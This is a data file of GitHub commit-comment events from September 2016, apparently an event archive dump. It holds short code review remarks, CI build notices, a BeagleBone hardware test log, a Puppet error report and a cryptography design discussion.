{"id":"4536517780","type":"CommitCommentEvent","actor":{"login":"nerdsRob"},"repo":{"name":"ssmiech/picassoLoading"},"payload":{"comment":{"id":18952584,"position":15,"line":15,"path":"app/src/test/java/com/sqs/imageloading/ExampleUnitTest.java","commit_id":"32d7cd57d2d5a90fa2ce557851f7665c0d16b611","created_at":"2016-09-08T20:40:24Z","updated_at":"2016-09-08T20:40:24Z","body":"Seems about right..."}},"created_at":"2016-09-08T20:40:24Z"}
{"id":"4536518725","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"sebastienros/jint"},"payload":{"comment":{"id":18952588,"position":null,"line":null,"path":null,"commit_id":"c97d5887d55081eb2bfc62be91c7ef4a5de1c04a","created_at":"2016-09-08T20:40:34Z","updated_at":"2016-09-08T20:40:34Z","body":"Has this fix been released yet? It doesn't look to be in the master branch."}},"created_at":"2016-09-08T20:40:34Z"}
{"id":"4536522665","type":"CommitCommentEvent","actor":{"login":"kduske"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":18952602,"position":28,"line":45,"path":"common/src/Model/CollectTouchingNodesVisitor.h","commit_id":"bf0dcc4c029aacdcb6810f98209c35478ad2863c","created_at":"2016-09-08T20:41:19Z","updated_at":"2016-09-08T20:41:19Z","body":"Yup, must have typed in the wrong window or something. Fixed now."}},"created_at":"2016-09-08T20:41:19Z"}
{"id":"4536525594","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"roboterclubaachen/xpcc"},"payload":{"comment":{"id":18952610,"position":null,"line":null,"path":null,"commit_id":"da3377c01898ea4d1c8f651875169a998c39370b","created_at":"2016-09-08T20:41:50Z","updated_at":"2016-09-08T20:41:50Z","body":"OMGWTFBBQ"}},"created_at":"2016-09-08T20:41:50Z"}
{"id":"4536527225","type":"CommitCommentEvent","actor":{"login":"crepererum"},"repo":{"name":"spz-signup/spz-signup"},"payload":{"comment":{"id":18952617,"position":null,"line":null,"path":null,"commit_id":"05e29af340d5f83a3238ad35967222e1249b1dfa","created_at":"2016-09-08T20:42:08Z","updated_at":"2016-09-08T20:42:08Z","body":"@daniel-j-h is going to like that one, I guess :smiley: :lock: "}},"created_at":"2016-09-08T20:42:08Z"}
{"id":"4536530411","type":"CommitCommentEvent","actor":{"login":"NateKeefe"},"repo":{"name":"NateKeefe/zendesk-connector"},"payload":{"comment":{"id":18952633,"position":null,"line":null,"path":null,"commit_id":"c1afda4f46f7b3db3d7bd46d536c4e0ab95584f9","created_at":"2016-09-08T20:42:43Z","updated_at":"2016-09-08T20:42:43Z","body":"If you're starting on a brand new connector, use this VS solution to get started."}},"created_at":"2016-09-08T20:42:43Z"}
{"id":"4536534611","type":"CommitCommentEvent","actor":{"login":"kitsh"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952645,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:43:28Z","updated_at":"2016-09-08T20:43:28Z","body":"@Random sounds coming from random tabs +1"}},"created_at":"2016-09-08T20:43:28Z"}
{"id":"4536538246","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18952663,"position":null,"line":null,"path":null,"commit_id":"027f08ccc48e0e1d18fe79a757375454afb71c85","created_at":"2016-09-08T20:44:11Z","updated_at":"2016-09-08T20:44:11Z","body":"nice"}},"created_at":"2016-09-08T20:44:11Z"}
{"id":"4536539767","type":"CommitCommentEvent","actor":{"login":"tplive"},"repo":{"name":"tplive/testgit"},"payload":{"comment":{"id":18952667,"position":4,"line":111,"path":"index.html","commit_id":"ce11a4f687979271e47ff1ecdbdaf0dfe60945eb","created_at":"2016-09-08T20:44:26Z","updated_at":"2016-09-08T20:44:26Z","body":"This was wrong in last commit"}},"created_at":"2016-09-08T20:44:26Z"}
{"id":"4536542967","type":"CommitCommentEvent","actor":{"login":"Henry0422"},"repo":{"name":"Beamlines-CanadianLightSource/SGMPy"},"payload":{"comment":{"id":18952677,"position":null,"line":null,"path":null,"commit_id":"52f55a30a5557db9af9f164b44f2df83b1a9741d","created_at":"2016-09-08T20:45:05Z","updated_at":"2016-09-08T20:45:05Z","body":"[Typo] New sample file name"}},"created_at":"2016-09-08T20:45:05Z"}
{"id":"4536543243","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952679,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:45:09Z","updated_at":"2016-09-08T20:45:09Z","body":"WHY DOESN'T XKIT WORK AND WHY DON'T YOU JUST ADOPT ALL THEIR CODING SO WE DONT HAVE TO GIVE THEM THE POWER TO MAKE POSTS?"}},"created_at":"2016-09-08T20:45:09Z"}
{"id":"4536544410","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18952686,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T20:45:22Z","updated_at":"2016-09-08T20:45:22Z","body":"@rkrishnan2012 @blystad\r\nProbably code similar to this could be added to the script:\r\nhttps://github.com/opengapps/opengapps/blob/master/download_sources.sh#L63-L69"}},"created_at":"2016-09-08T20:45:22Z"}
{"id":"4536553157","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952719,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:46:58Z","updated_at":"2016-09-08T20:46:58Z","body":"WHY DON'T YOU HAVE A CAFE WHERE WE CAN DISPLAY OUR BOGS ON GIANT SCREENS TO MEET PEOPLE.  AND TREADMILLS?\r\n"}},"created_at":"2016-09-08T20:46:58Z"}
{"id":"4536558931","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"jadonk/beagle-tester"},"payload":{"comment":{"id":18952732,"position":null,"line":null,"path":null,"commit_id":"2675316ed3e1530b3c028544f4e73ae5177a00e9","created_at":"2016-09-08T20:48:03Z","updated_at":"2016-09-08T20:48:03Z","body":"```\r\ndebian@gamingcape1:~/beagle-tester$ sudo ./beagle-tester ABCD\r\nFound input device ID: bus 0x0 vendor 0x0 product 0x0 version 0x0\r\nCan't open display :0.0\r\nCan't open display :0.0\r\nCan't open display :0.0\r\nPlaying WAVE '/usr/share/sounds/alsa/Front_Center.wav' : Signed 16 bit Little Endian, Rate 48000 Hz, Mono\r\nfb res 1024x768 virtual 1024x768, line_len 2048, bpp 16\r\n          scan : ABCD                                              \r\n         model : TI AM335x BeagleBone Black Wireless               \r\n   init eeprom : �U3335BNLTBWA3������������                      \r\n        dogtag : BeagleBoard.org Debian Image 2016-09-04           \r\nmemtester 1M 1 > /dev/null\r\n        memory : pass                                              \r\n        tether : BeagleBone-C17E\r\n                                  \r\nping -s 8184 -i 0.01 -q -c 150 -w 2 -I wlan0 192.168.0.1 > /dev/null\r\n          wifi : pass                                              \r\nping -s 8184 -i 0.01 -q -c 150 -w 2 -I usb0 192.168.7.1 > /dev/null\r\n    usb client : fail                      \r\n```"}},"created_at":"2016-09-08T20:48:03Z"}
{"id":"4536558954","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18952733,"position":17,"line":89,"path":"src/main/scala/mesosphere/marathon/core/pod/PodDefinition.scala","commit_id":"47044021779761c4534ae9ef076321a31247a1c2","created_at":"2016-09-08T20:48:03Z","updated_at":"2016-09-08T20:48:03Z","body":"good catch"}},"created_at":"2016-09-08T20:48:03Z"}
{"id":"4536559883","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18952737,"position":65,"line":115,"path":"FoodTracker/FoodTracker/MealTableViewController.swift","commit_id":"f92dbc2afb6d6fbb3443a0bf85f6014a60a78739","created_at":"2016-09-08T20:48:14Z","updated_at":"2016-09-08T20:48:14Z","body":"ovaj segue ti netreba \"Add item\" on nista ne radi"}},"created_at":"2016-09-08T20:48:14Z"}
{"id":"4536561817","type":"CommitCommentEvent","actor":{"login":"Henry0422"},"repo":{"name":"Beamlines-CanadianLightSource/SGMPy"},"payload":{"comment":{"id":18952744,"position":null,"line":null,"path":null,"commit_id":"a9a8e8e5562c360b74ba4e8f763d9c7041e89398","created_at":"2016-09-08T20:48:35Z","updated_at":"2016-09-08T20:48:35Z","body":"This fix is related to issue #47"}},"created_at":"2016-09-08T20:48:35Z"}
{"id":"4536561831","type":"CommitCommentEvent","actor":{"login":"MikhailArkhipov"},"repo":{"name":"Microsoft/RTVS"},"payload":{"comment":{"id":18952745,"position":24,"line":22,"path":"src/Common/Core/Impl/Threading/BinaryAsyncLock.cs","commit_id":"b1971d6ed00dc92db46f434525253566c2cdb9ba","created_at":"2016-09-08T20:48:35Z","updated_at":"2016-09-08T20:48:35Z","body":"ConcurrentQueue?"}},"created_at":"2016-09-08T20:48:35Z"}
{"id":"4536562738","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952748,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:48:44Z","updated_at":"2016-09-08T20:48:44Z","body":"WHY DONT YOU HAVE A CONVENTION?"}},"created_at":"2016-09-08T20:48:44Z"}
{"id":"4536563006","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18952749,"position":21,"line":78,"path":"FoodTracker/FoodTracker/ViewController.swift","commit_id":"f92dbc2afb6d6fbb3443a0bf85f6014a60a78739","created_at":"2016-09-08T20:48:48Z","updated_at":"2016-09-08T20:48:48Z","body":"if let navController = navigationController {...}"}},"created_at":"2016-09-08T20:48:48Z"}
{"id":"4536568162","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18952762,"position":52,"line":52,"path":"FoodTracker/FoodTracker/MealTableViewController.swift","commit_id":"50b7e0c3f57045637cb690e07838d86f42b12570","created_at":"2016-09-08T20:49:43Z","updated_at":"2016-09-08T20:49:43Z","body":"ovaj cellIdentifier nigdje ne koristis?"}},"created_at":"2016-09-08T20:49:43Z"}
{"id":"4536571475","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952774,"position":1,"line":1,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:50:21Z","updated_at":"2016-09-08T20:50:21Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366331/200d24d6-7638-11e6-950f-8ff85f4bfe10.jpg)\r\n"}},"created_at":"2016-09-08T20:50:21Z"}
{"id":"4536574157","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952782,"position":1,"line":1,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:50:49Z","updated_at":"2016-09-08T20:50:49Z","body":"SK"}},"created_at":"2016-09-08T20:50:49Z"}
{"id":"4536575607","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18952785,"position":null,"line":null,"path":null,"commit_id":"0ad398d95480eaa33a35eb783fba8344b7b82b57","created_at":"2016-09-08T20:51:06Z","updated_at":"2016-09-08T20:51:06Z","body":"thanks @mancoast . the setup scripts and descriptions are not yet fully consistent. I hope to get this cleaned out in the future.\r\nAlso the qtgamepad support is still buggy (the library was pretty unstable at the time i tried it, and some things have changed about the API which are not backward compatible). When i got this fixed i will check all setup stuff about qtgamepad"}},"created_at":"2016-09-08T20:51:06Z"}
{"id":"4536576352","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952789,"position":2,"line":2,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:51:14Z","updated_at":"2016-09-08T20:51:14Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366373/4284d8d8-7638-11e6-955b-6f01655005a1.jpg)\r\n"}},"created_at":"2016-09-08T20:51:14Z"}
{"id":"4536576641","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18952790,"position":13,"line":6,"path":"app/controllers/categories_controller.rb","commit_id":"06c40944ad9af9ceb7af751fe88d87d6799805e9","created_at":"2016-09-08T20:51:18Z","updated_at":"2016-09-08T20:51:18Z","body":"ты же можешь это тоже в expose вынести\r\n\r\n```ruby\r\nexpose(:category_name) { Category.find(params[:id]).name }\r\n```"}},"created_at":"2016-09-08T20:51:18Z"}
{"id":"4536577548","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952794,"position":2,"line":2,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:51:27Z","updated_at":"2016-09-08T20:51:27Z","body":"SK"}},"created_at":"2016-09-08T20:51:27Z"}
{"id":"4536577636","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18952796,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-08T20:51:27Z","updated_at":"2016-09-08T20:51:27Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.266.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76723&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:35:16"}},"created_at":"2016-09-08T20:51:27Z"}
{"id":"4536580621","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952804,"position":3,"line":3,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:52:02Z","updated_at":"2016-09-08T20:52:02Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366407/5d617a4e-7638-11e6-9e49-e1006484d43a.jpg)\r\n"}},"created_at":"2016-09-08T20:52:02Z"}
{"id":"4536580791","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952806,"position":4,"line":4,"path":".gitignore","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:52:05Z","updated_at":"2016-09-08T20:52:05Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366410/6027c77e-7638-11e6-8e69-aeb7112181f7.jpg)\r\n"}},"created_at":"2016-09-08T20:52:05Z"}
{"id":"4536582058","type":"CommitCommentEvent","actor":{"login":"coldnebo"},"repo":{"name":"coldnebo/data_hut"},"payload":{"comment":{"id":18952808,"position":null,"line":null,"path":null,"commit_id":"db9020b67db8829d234e852e20a271d4c68291dd","created_at":"2016-09-08T20:52:19Z","updated_at":"2016-09-08T20:52:19Z","body":"fixes #2 \r\n(or more accurately fixes the false negative from differing travis configs for various rubies... I only care about the core MRI that we are using right now, the rest should also work, but I don't have time to wrestle travis for the other builds... could use some help on this if someone wants to contribute?)"}},"created_at":"2016-09-08T20:52:19Z"}
{"id":"4536582717","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952813,"position":1,"line":1,"path":"LICENSE","commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:52:26Z","updated_at":"2016-09-08T20:52:26Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366426/6d877252-7638-11e6-9cd8-b91e242c59eb.jpg)\r\n"}},"created_at":"2016-09-08T20:52:26Z"}
{"id":"4536584054","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18952817,"position":22,"line":37,"path":"src/Polly.Shared/Throttle/ThrottleEngineAsync.cs","commit_id":"6e1c3c6ce16fe17cb66eee7109f5b359c68199be","created_at":"2016-09-08T20:52:41Z","updated_at":"2016-09-08T20:52:41Z","body":"Just noting at this point that we could consider adding a utility class for the Net40Async users, so that we could provide async waiting here.  eg based on [this](http://stackoverflow.com/questions/28028262/using-await-semaphoreslim-waitasync-in-net-4) or [this](http://www.hanselman.com/blog/ComparingTwoTechniquesInNETAsynchronousCoordinationPrimitives.aspx) . All of Stephen Toub, Stephen Cleary and Bar Arnon are thought-leaders.  \r\n\r\nHowever, *please don't add this now*.  Want first to review overall (when we've all V5.0 policies prototyped in some way), in how many areas we are struggling supporting .NET4.0.  "}},"created_at":"2016-09-08T20:52:41Z"}
{"id":"4536584087","type":"CommitCommentEvent","actor":{"login":"pchiusano"},"repo":{"name":"unisonweb/unison"},"payload":{"comment":{"id":18952818,"position":39,"line":33,"path":"node/src/Unison/Runtime/Cryptography.hs","commit_id":"8c99adb495e166b66cb6447c0465ac50da0aa6f0","created_at":"2016-09-08T20:52:41Z","updated_at":"2016-09-08T20:52:41Z","body":"Hey @tmciver just reviewing now. So I was thinking what you can do, since you are in `IO`, is just generate a random 96-bit nonce - that can be part of the output message.\r\n\r\nHowever, the construction will need to be more complicated. We need to do some MAC'ing of the packet, to prevent an attacker from truncating or tampering with the message. I was asking in ##crypto on IRC about this. Here's the conversation, it was very informative: https://gist.github.com/pchiusano/0130b124bd17175af3381af1037dbf7d (some other conversations interleaved)\r\n\r\nCan you become an expert in this? :) Then have encrypt/decrypt use a standard construction. It looks like the one given by Riastradh would be simple to implement, and cryptonite has all the primitives, I think that would be my preference. There might also be Haskell bindings to the libsodium library they mention, which has the construction.\r\n\r\nWe'll try to get one of those folks to audit once we have something. "}},"created_at":"2016-09-08T20:52:41Z"}
{"id":"4536585048","type":"CommitCommentEvent","actor":{"login":"Sallma9393"},"repo":{"name":"Sallma9393/Mo"},"payload":{"comment":{"id":18952821,"position":null,"line":null,"path":null,"commit_id":"165c28336f4b0ffea6186f80d237a9851a5fe060","created_at":"2016-09-08T20:52:52Z","updated_at":"2016-09-08T20:52:52Z","body":"![507864088](https://cloud.githubusercontent.com/assets/22085447/18366440/7b1ce8fc-7638-11e6-9103-ea0eeb8d0021.jpg)\r\n"}},"created_at":"2016-09-08T20:52:52Z"}
{"id":"4536590822","type":"CommitCommentEvent","actor":{"login":"jimfenton"},"repo":{"name":"jimfenton/800-63-3"},"payload":{"comment":{"id":18952829,"position":null,"line":null,"path":null,"commit_id":"1dde261995eb14a6f5c90376e223b519a1175f0e","created_at":"2016-09-08T20:53:55Z","updated_at":"2016-09-08T20:53:55Z","body":"Closes usnistgov/800-63-3#234"}},"created_at":"2016-09-08T20:53:55Z"}
{"id":"4536591319","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18952830,"position":null,"line":null,"path":null,"commit_id":"49ef350a85e580628a6dcf03a7a6aa364c6c4df8","created_at":"2016-09-08T20:54:01Z","updated_at":"2016-09-08T20:54:01Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-08T20:54:01Z"}
{"id":"4536592560","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18952832,"position":10,"line":9,"path":"config/routes.rb","commit_id":"06c40944ad9af9ceb7af751fe88d87d6799805e9","created_at":"2016-09-08T20:54:15Z","updated_at":"2016-09-08T20:54:15Z","body":"могу ошибаться, но обычно я видел встречал формат ```%i( a b )``` (то есть скобки внутри `%i()`). Собственно, сам я только его придерживался"}},"created_at":"2016-09-08T20:54:15Z"}
{"id":"4536597804","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18952838,"position":36,"line":198,"path":"components/pedigree/resources/src/main/resources/pedigree/model/export.js","commit_id":"74bb84898f49b7a83bca47d5fcdab9e4a9517da0","created_at":"2016-09-08T20:55:14Z","updated_at":"2016-09-08T20:55:14Z","body":"why not just do nodeDisorders.filter(....)?"}},"created_at":"2016-09-08T20:55:14Z"}
{"id":"4536601690","type":"CommitCommentEvent","actor":{"login":"alexfouche"},"repo":{"name":"lwf/puppet-remote_file"},"payload":{"comment":{"id":18952844,"position":null,"line":null,"path":null,"commit_id":"e37d6342e5248f13ee5b52958e1ed64b3365ecbd","created_at":"2016-09-08T20:55:54Z","updated_at":"2016-09-08T20:55:54Z","body":"This commit broke my runs. I am using Puppet 4 opensource\r\n\r\n    Remote_file[/etc/yum.repos.d/passenger.repo]: Could not evaluate: no implicit conversion of true into String\r\n\r\nwhen i used \r\n\r\n        remote_file { '/etc/yum.repos.d/passenger.repo':\r\n                ensure  => present,\r\n                source  => 'https://oss-binaries.phusionpassenger.com/yum/definitions/el-passenger.repo',\r\n        }"}},"created_at":"2016-09-08T20:55:54Z"}
{"id":"4536604802","type":"CommitCommentEvent","actor":{"login":"ratoaq2"},"repo":{"name":"guessit-io/guessit"},"payload":{"comment":{"id":18952851,"position":12,"line":14,"path":"HISTORY.rst","commit_id":"93d4367af608dfc3e68fe8f618d9ff0d62d369a0","created_at":"2016-09-08T20:56:28Z","updated_at":"2016-09-08T20:56:28Z","body":"Was this changed/fixed in this release? "}},"created_at":"2016-09-08T20:56:28Z"}
{"id":"4536609577","type":"CommitCommentEvent","actor":{"login":"phil0079"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18952865,"position":null,"line":null,"path":null,"commit_id":"73c68b2902a628483340b165378b2f6f167c3956","created_at":"2016-09-08T20:57:21Z","updated_at":"2016-09-08T20:57:21Z","body":"Still though, this only generates a large hexagon from the center outward? I have been having to export the lat/long, import them into a google map instance, manually delete the points I don't want in order to customize my search area, then export those lat/long back into a document to build the commands I need to start all the workers. Is this currently still the best way to make a custom search area that is not a large hexagon?"}},"created_at":"2016-09-08T20:57:21Z"}
{"id":"4536618837","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18952884,"position":null,"line":null,"path":null,"commit_id":"441796abe120ad4a9c2c86fe65886e11f309fdf3","created_at":"2016-09-08T20:59:01Z","updated_at":"2016-09-08T20:59:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#X5YwbxiIS42tGiZLaLKhyQ"}},"created_at":"2016-09-08T20:59:01Z"}
{"id":"4536619397","type":"CommitCommentEvent","actor":{"login":"Blystad"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18952888,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T20:59:09Z","updated_at":"2016-09-08T20:59:09Z","body":"I read 100GiB and was like: what the fuck Google...what sort of magic are you pulling off this time? But luckily it was 100MiB.\r\n\r\nAnyways, I'll figure out a trick. Will look into it during the weekend, but for the aosp_build project I'll probably use a makefile trick.\r\n\r\nHow large is the file lz compressed? and, any reason why we can't use git lfs?"}},"created_at":"2016-09-08T20:59:09Z"}
{"id":"4536630535","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952916,"position":null,"line":null,"path":null,"commit_id":"165a00a8cd0feb35080a0bd909f947ab1489d671","created_at":"2016-09-08T21:01:09Z","updated_at":"2016-09-08T21:01:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:09Z"}
{"id":"4536630859","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952920,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:13Z","updated_at":"2016-09-08T21:01:13Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:13Z"}
{"id":"4536631200","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952921,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:16Z","updated_at":"2016-09-08T21:01:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:16Z"}
{"id":"4536631471","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952922,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:19Z","updated_at":"2016-09-08T21:01:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:19Z"}
{"id":"4536631535","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952925,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:19Z","updated_at":"2016-09-08T21:01:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:19Z"}
{"id":"4536631546","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952926,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:20Z","updated_at":"2016-09-08T21:01:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:20Z"}
{"id":"4536631663","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952928,"position":null,"line":null,"path":null,"commit_id":"e9e5eb837dba4e97a0711da5666b7245532c95f4","created_at":"2016-09-08T21:01:21Z","updated_at":"2016-09-08T21:01:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:21Z"}
{"id":"4536632740","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952931,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:32Z","updated_at":"2016-09-08T21:01:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:32Z"}
